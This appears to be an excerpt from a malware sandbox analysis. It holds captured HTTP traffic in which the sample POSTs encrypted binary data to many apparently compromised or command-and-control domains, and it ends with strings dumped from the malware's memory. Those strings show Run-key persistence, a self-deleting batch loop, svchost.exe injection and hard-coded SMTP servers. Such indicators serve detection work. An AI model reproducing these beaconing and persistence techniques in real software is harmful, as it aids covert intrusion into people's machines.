<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>403 - Forbidden: Access is denied.</title>..<style type="text/css">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>403 - Forbidden: Access is denied.</h2>.. <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>.. </fieldset></div>..</div>..</body>..</html>....
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 480
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: screaminpeach.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Sat, 12 Apr 2014 14:40:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d22805e80c79ca447eea8214c754687c61397313616443; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.screaminpeach.com; HttpOnly
CF-RAY: 11a02d96ce0102b8-IAD
2556..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->.<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->.<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->.<head>.<title>Attention Required! | CloudFlare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />.<!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>.<!--[if lt IE 9]><script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script><![endif]-->.<!--[if gte IE 9]><!--><script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/zepto/1.0/zepto.min.js"></script><!--<![endif]-->.<script type="t
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 496
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: churchsupplies.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Date: Sat, 12 Apr 2014 14:40:41 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 5039
Keep-Alive: timeout=2, max=25
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "hXXp://VVV.w3.org/TR/xhtml11/DTD/xhtml11.dtd">..<head>...<title>Apache HTTP Server Test Page powered by CentOS</title>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />...<style type="text/css">....body {.....background-color: #fff;.....color: #000;.....font-size: 0.9em;.....font-family: sans-serif,helvetica;.....margin: 0;.....padding: 0;....}....:link {.....color: #0000FF;....}....:visited {.....color: #0000FF;....}....a:hover {.....color: #3399FF;....}....h1 {.....text-align: center;.....margin: 0;.....padding: 0.6em 2em 0.4em;.....background-color: #3399FF;.....color: #ffffff;.....font-weight: normal;.....font-size: 1.75em;.....border-bottom: 2px solid #000;....}....h1 strong {.....font-weight: bold;....}....h2 {.....font-size: 1.1em;.....font-weight: bold;....}.....content {.....padding: 1em 5em;....}.....content-columns {...../* Setting relative positioning allows for .....absolute positioning for sub-classes */.....position: relative;.....padding-top: 1em;....}.....content-column-left {...../* Value for IE/Win; will be overwritten for other browsers */.....width: 47%;.....padding-right: 3%;.....float: left;.....padding-bottom: 2em;....}.....content-column-right {...../* Values for IE/Win; will be overwritten for other browsers */.....width: 47%;.....padding-left: 3%;.....float: left;.....padding-bottom: 2em;....}.....content-columns>.content-column-left, .content-columns>.content-column-righ
<<< skipped >>>
GET /v02 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iaiglobal.or.id
Connection: Keep-Alive
Cache-Control: no-cache
GET /v02 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iaiglobal.or.id
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Date: Sat, 12 Apr 2014 14:40:52 GMT
Server: Apache
Location: hXXp://VVV.iaiglobal.or.id/v02/
Vary: Accept-Encoding
Content-Length: 308
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://VVV.iaiglobal.or.id/v02/">here</a>.</p>.<hr>.<address>Apache Server at VVV.iaiglobal.or.id Port 80</address>.</body></html>...
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 558
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: neurotoxininstitute.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 503 Service Temporarily Unavailable
Server: cloudflare-nginx
Date: Sat, 12 Apr 2014 14:41:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da1d2d89df205aa1436f42e743221d8681397313705664; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.neurotoxininstitute.com; HttpOnly
Cache-Control: max-age=5
Expires: Sat, 12 Apr 2014 14:41:50 GMT
CF-RAY: 11a02fc46d130844-IAD
bf2..<!DOCTYPE HTML>.<html lang="en-US">.<head>. <meta charset="UTF-8" />. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />. <meta name="robots" content="noindex, nofollow" />. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />. <title>Just a moment...</title>. <style type="text/css">. html, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body {background-color: #ffffff; font-family: Helvetica, Arial, sans-serif; font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-align: center;}. p {font-size: 1em; color: #404040; text-align: center; margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display: block;}. .attribution {margin-top: 20px;}. </style>. <script type="text/javascript">. //<![CDATA[. (function(){. var onReady = function( callback ){. var addListener = document.addEventListener || document.attachEvent,. eventName = document.addEventListener ? 'DOMContentLoaded' : 'onreadystatechange';. addListener.call(document, eventName, function(){ callback(); }, false );. }.. onReady(function(){. var content = document.getElementById('cf-content');. content.style.display = 'block';.. setTimeout(function(){. var t,r,a,f;. t = document.createElement('div');. t.innerHTML="<a href='/'>x</
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 37
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tobler-skele.bg
Connection: Keep-Alive
Cache-Control: no-cache
..x...*.6~...H....@ G.. ...!.qU"X<.#.
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:41:53 GMT
Server: Apache
Last-Modified: Sun, 23 Mar 2014 10:20:12 GMT
ETag: "44a00c9-5212-4f54376ded315"
Accept-Ranges: bytes
Content-Length: 21010
Keep-Alive: timeout=5, max=5
Connection: Keep-Alive
Content-Type: text/html
<html>....<!-- Mirrored from tobler-skele.bg/ by HTTrack Website Copier/3.x [XR&CO'2013], Tue, 18 Mar 2014 10:01:33 GMT -->..<head>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<title>Tobler - .................... .............. - .............., .............., .............. - ................ .. ...... ........</title>....<style>..<!--..table { font-family: Verdana; font-size: 11px }..td { font-family: Verdana; font-size: 11px }..A {...TEXT-DECORATION: none..}..A:hover {...COLOR: blue; TEXT-DECORATION: none..}..-->..</style>..<meta name="description" content="............ .......... ........ .. .................. ........................ .... Baugeruste Tobler AG, .................. .... ................. .................. .............. .. ................ .. ................ ...... ........ .... .................... .............., ................ ................ .. ...............">..<meta name="keywords" content=".................... .. .............. .............., .............., .............., .........., ................ .............., ................ .............., .................. .........., .........., .................. .. .................... ......................, ................ ............">..</head>..<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" bgcolor="#E8E8E8" link="#000080" vlink="#000080" alink="#000080">..<div align="center"&
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 113
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tobler-skele.bg
Connection: Keep-Alive
Cache-Control: no-cache
....^.v.......W.....C>.......g..e.H......%....s.=O....:..x.._....e..6....,.o`...[...p.F.....8........T$.{......
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:41:54 GMT
Server: Apache
Last-Modified: Sun, 23 Mar 2014 10:20:12 GMT
ETag: "44a00c9-5212-4f54376ded315"
Accept-Ranges: bytes
Content-Length: 21010
Keep-Alive: timeout=5, max=4
Connection: Keep-Alive
Content-Type: text/html
<html>....<!-- Mirrored from tobler-skele.bg/ by HTTrack Website Copier/3.x [XR&CO'2013], Tue, 18 Mar 2014 10:01:33 GMT -->..<head>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<title>Tobler - .................... .............. - .............., .............., .............. - ................ .. ...... ........</title>....<style>..<!--..table { font-family: Verdana; font-size: 11px }..td { font-family: Verdana; font-size: 11px }..A {...TEXT-DECORATION: none..}..A:hover {...COLOR: blue; TEXT-DECORATION: none..}..-->..</style>..<meta name="description" content="............ .......... ........ .. .................. ........................ .... Baugeruste Tobler AG, .................. .... ................. .................. .............. .. ................ .. ................ ...... ........ .... .................... .............., ................ ................ .. ...............">..<meta name="keywords" content=".................... .. .............. .............., .............., .............., .........., ................ .............., ................ .............., .................. .........., .........., .................. .. .................... ......................, ................ ............">..</head>..<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" bgcolor="#E8E8E8" link="#000080" vlink="#000080" alink="#000080">..<div align="center"&
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 528
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rueggeberg.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Server: nginx/1.2.1
Date: Sat, 12 Apr 2014 14:40:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 570
Connection: keep-alive
Vary: Accept-Encoding
<html>..<head><title>403 Forbidden</title></head>..<body bgcolor="white">..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx/1.2.1</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->....
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 550
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: gamblingonlinemagazine.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 406 Not Acceptable
Date: Sat, 12 Apr 2014 14:41:42 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8i DAV/2 FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
Content-Length: 13
Connection: close
Content-Type: text/html; charset=iso-8859-1
Access Denied..
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 570
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sztartufi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 12 Apr 2014 14:41:27 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>403 Forbidden</title></head>..<body bgcolor="white">..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->....
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 480
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: saios.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Date: Sat, 12 Apr 2014 14:40:29 GMT
Server: Apache
Location: hXXp://VVV.saios.net/
Content-Length: 205
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://VVV.saios.net/">here</a>.</p>.</body></html>...
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 450
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ezmedi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Date: Sat, 12 Apr 2014 14:41:46 GMT
Server: Microsoft-IIS/5.0
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
37..[an error occurred while processing this directive].. ..90.... You don't have permission to access the requested directory.. There is either no index document or the directory is read-protected... ..2......34..[an error occurred while processing this directive]...0..
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 542
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rewardhits.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: nginx/1.4.2
Date: Sat, 12 Apr 2014 14:41:26 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 382
Connection: keep-alive
Location: hXXp://VVV.teknorhino.com/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://VVV.teknorhino.com/">here</a>.</p>.<hr>.<address>Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.17 Server at rewardhits.com Port 80</address>.</body></html>...
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 133
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qistech.com
Connection: Keep-Alive
Cache-Control: no-cache
...-~7..4.a0.`.1..(3V..4..5..S7xH.8...:...;...=jgx> ..?..?A.%.BB..D.NjE...F.x1H=.I...Ks..LI1.M..<O..:.^S6R...W.~.T....k..W.?.Y.7.[.
HTTP/1.1 302 Found
Date: Sat, 12 Apr 2014 14:42:05 GMT
Server: Apache
Location: hXXp://VVV.qistech.com/
Content-Length: 207
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://VVV.qistech.com/">here</a>.</p>.</body></html>...
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 52
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: benefits-inc.com
Connection: Keep-Alive
Cache-Control: no-cache
j*/2 ..3.S.4..Y6B}.7..!9...:d;.;..K=.d.>...@<.vA.".B
HTTP/1.1 500 Internal Server Error
Date: Sat, 12 Apr 2014 14:42:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 251
Connection: keep-alive
Keep-Alive: timeout=30
Server: Apache/2
X-Powered-By: PHP/5.2.17
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
<!DOCTYPE html>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />..<title>Database Error</title>..</head>.<body>..<h1>Error establishing a database connection</h1>.</body>.</html>...
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 512
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: hostphd.com.br
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:40:26 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Last-Modified: Sun, 23 Mar 2014 15:46:09 GMT
Content-Type: text/html
Content-Length: 24609
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">.<title>Hospedagem de Sites Ilimitada, Revenda de Hospedagem, Hospedagem de Sites Windows, Linux , SEO ,HOSTPHD</title>.<meta http-equiv="Content-Language" content="pt-br" />.<meta name="TITLE" content="Hospedagem de Sites Ilimitada, Revenda de Hospedagem, Hospedagem de Sites Windows, Linux , SEO ,HOSTPHD" />..<meta name="KEYWORDS" content="Hospedagem de Sites, Ilimitada, trafego ilimitado,Revenda de Hospedagem, Windows, Linux, Streaming, Vps, dedicados, dominios, patrocinios,construtor, revenda ilimitada, whmcs, construtor sites"/>..<meta name="DESCRIPTION" content="Hospedagem de Sites Ilimitada, trafego ilimitado,Revenda de Hospedagem, Hospedagem de Sites Windows, Linux, Streaming, Vps, dedicados, dominios, patrocinios,construtor" />..<meta name="ABSTRACT" content="Hospedagem de Sites: Hospedagem de Sites, Planos de Revenda, Servidores Dedicados, Hospedagem de Sites Linux, Hospedagem de Sites Windows, Planos de Revenda Linux, Planos de Revenda Windows, Revenda Windows, Revenda Linux, Servidor Dedicado Linux, Servidor Dedicado Windows, Servidores Dedicados Windows, Servidores Dedicados Linux, Servidores Dedicados Linux com cPanel, Servidores Dedicados Windows com Plesk, Registros de Dom.nio Internacional, Re
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 558
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: justconnect.co.za
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: nginx/1.1.19
Date: Sat, 12 Apr 2014 14:40:16 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://VVV.justconnect.co.za/
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.1.19</center>..</body>..</html>....
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 508
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: cgc-england.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:40:16 GMT
Server: Apache
Last-Modified: Fri, 17 Jan 2014 11:51:26 GMT
Accept-Ranges: bytes
Content-Length: 13968
Keep-Alive: timeout=2, max=90
Connection: Keep-Alive
Content-Type: text/html
Content-Language: fr
<!DOCTYPE html>.<html lang="fr-FR" prefix="og: hXXp://ogp.me/ns#" class="no-js csstransforms no-csstransforms3d csstransitions">.<head>.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta charset="utf-8">.....<title>CAMBRIDGE GARDENS COLLEGE | English Language School in Hastings</title>...........<!-- Mobile Specific Metas. .================================================== -->..<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> ....<link rel="profile" href="hXXp://gmpg.org/xfn/11">..<link rel="alternate" type="application/rss xml" title="RSS 2.0" href="hXXp://VVV.cgc-england.com/feed/">..<link rel="alternate" type="text/xml" title="RSS .92" href="hXXp://VVV.cgc-england.com/feed/rss/">..<link rel="alternate" type="application/atom xml" title="Atom 0.3" href="http://VVV.cgc-england.com/feed/atom/">..<link rel="pingback" href="hXXp://VVV.cgc-england.com/xmlrpc.php">..<link rel="shortcut icon" href="flavicon.png" type="image/gif">............<meta name="robots" content="noindex,nofollow">..<!-- This site is optimized with the Yoast WordPress SEO plugin v1.4.13 - hXXp://yoast.com/wordpress/seo/ -->.<link rel="canonical" href="hXXp://VVV.cgc-england.com/">.<meta property="og:locale" content="fr_FR">.<meta property="og:type" content="website">.<meta property="og:title" content="CAMBRIDGE GARDENS COLLEGE - English Language School in Ha
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 254
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tsu-box.com
Connection: Keep-Alive
Cache-Control: no-cache
........!`..2. .C.6.T}K.e.`.v;v......_...$.......H-...B...X.%fm.6...G$..e....H.......l ...N..*K...`....N.....'..6...08.Vs...i.(.......m..r.......0.......
.%.9.6.N.G>d.X.y.i...z[...........x...=....B..aW...l..
:..KD..\...m...~a...&5...J..Jy..........g
HTTP/1.1 500 Internal Server Error
Date: Sat, 12 Apr 2014 14:42:12 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 12 Apr 2014 14:42:13 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
3a..<!DOCTYPE html>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml"..57..>.<head>.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />..<title>..1b...............................1e..</title>..</head>.<body>..<h1>..27...........................................16..</h1>.</body>.</html>...0..
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.biurimex.pl
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 3966
Content-Type: text/html
Date: Sat, 12 Apr 2014 14:42:04 GMT
Last-Modified: Fri, 26 Jul 2013 10:07:38 GMT
Server: IdeaWebServer/v0.80
<html>..<head>..<meta http-equiv=Content-Type content="text/html; charset=windows-1250">..<meta name=Generator content="Microsoft Word 11 (filtered)">..<title> </title>..<style>..<!--.. /* Font Definitions */.. @font-face...{font-family:Tahoma;...panose-1:2 11 6 4 3 5 4 4 2 4;}.. /* Style Definitions */.. p.MsoNormal, li.MsoNormal, div.MsoNormal...{margin:0cm;...margin-bottom:.0001pt;...font-size:12.0pt;...font-family:"Times New Roman";}..h1...{margin-right:0cm;...margin-left:0cm;...font-size:24.0pt;...font-family:"Times New Roman";...font-weight:bold;}..a:link, span.MsoHyperlink...{color:blue;...text-decoration:underline;}..a:visited, span.MsoHyperlinkFollowed...{color:purple;...text-decoration:underline;}..p...{margin-right:0cm;...margin-left:0cm;...font-size:12.0pt;...font-family:"Times New Roman";}..@page Section1...{size:595.3pt 841.9pt;...margin:70.85pt 70.85pt 70.85pt 70.85pt;}..div.Section1...{page:Section1;}..-->..</style>..</head>..<body lang=PL link=blue vlink=purple>..<div class=Section1>..<p class=MsoNormal align=center style='text-align:center'><img width=1100..height=733 src="index_pliki/image001.jpg"></p>..<p class=MsoNormal> </p>..<p class=MsoNormal> </p>..<p class=MsoNormal> </p>..<p class=MsoNormal align=center style='text-align:center'><span..style='font-size:36.0pt;color:red'>STRONA W BUDOWIE!</span></p>..<p class=MsoNormal a
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 562
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: icigrain.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Date: Sat, 12 Apr 2014 14:40:46 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
X-Powered-By: PHP/5.4.22
Set-Cookie: PHPSESSID=16cee3056eb3b31f92edc74b47b72b7f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: hXXp://VVV.icigrain.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.icigrain.com/
Content-Length: 0
Strings from Dumps
JRY7B2.tmp_3796:
.text
`.rdata
.rsrc
9m,.spLoadImageA
R:\jfndh8883.dat
user32.dll
kernel32.dll
gdi32.dll
zxc098iuser32.dll
%,'gdi32.dll
[t.Kx
WG.OK
.hM-n
&n%cv|n
q*.AglS
x;P.IB
.sd~'\B4W
&sourly
thoughts compass
&Passion search
&Leahy's unascertained
&windows
pillars halted trying certainly
sports
&report located
&ports
&Alderman KEYES
4,1,4,24
welled.exe
JRY7B2.tmp_3796_rwx_04000000_0000F000:
.text
`.rdata
@.data
.reloc
software\microsoft\windows\currentversion\run
%s\%s.exe
Content-Length: %d
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
\system32\svchost.exe
software\microsoft\windows\currentversion
del %s
if exist %s goto :repeat
http://%s
kernel32.dll
smtp.compuserve.com
mail.airmail.net
smtp.directcon.net
smtp.sbcglobal.yahoo.com
smtp.mail.yahoo.com
smtp.live.com
CRYPT32.dll
PSAPI.DLL
USERENV.dll
IPHLPAPI.DLL
HttpQueryInfoA
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
InternetCrackUrlA
WININET.dll
WS2_32.dll
SHLWAPI.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
CryptExportKey
CryptGenKey
ADVAPI32.dll
ole32.dll
http://%s/
InternetOpenUrlA
zc)%c
-9276543007814
%Documents and Settings%\%current user%\sufkywiddeax.exe
53595`5}5
9-9K9}9
?$?(?,?0?4?
JRY7B2.tmp_3796_rwx_08900000_00012000:
.text7d/
~.rdata
.Lv~EF4)
.text
`.rdata
@.data
.reloc
software\microsoft\windows\currentversion\run
%s\%s.exe
Content-Length: %d
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
\system32\svchost.exe
software\microsoft\windows\currentversion
del %s
if exist %s goto :repeat
http://%s
kernel32.dll
smtp.compuserve.com
mail.airmail.net
smtp.directcon.net
smtp.sbcglobal.yahoo.com
smtp.mail.yahoo.com
smtp.live.com
CRYPT32.dll
PSAPI.DLL
USERENV.dll
IPHLPAPI.DLL
HttpQueryInfoA
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
InternetCrackUrlA
WININET.dll
WS2_32.dll
SHLWAPI.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
CryptExportKey
CryptGenKey
ADVAPI32.dll
ole32.dll
http://%s/
InternetOpenUrlA
zc)%c
-9276543007814
53595`5}5
9-9K9}9
?$?(?,?0?4?
@.reloc
@595`5}5
-9K9}
KERNEL32.DLL
svchost.exe_1876:
.text
`.data
iphlpapi.dll
inetcomm.dll
operator
KERNEL32.DLL
kernel32.dll
mscoree.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
GetProcessWindowStation
USER32.DLL
EX8^/u$9^%u
RegCloseKey
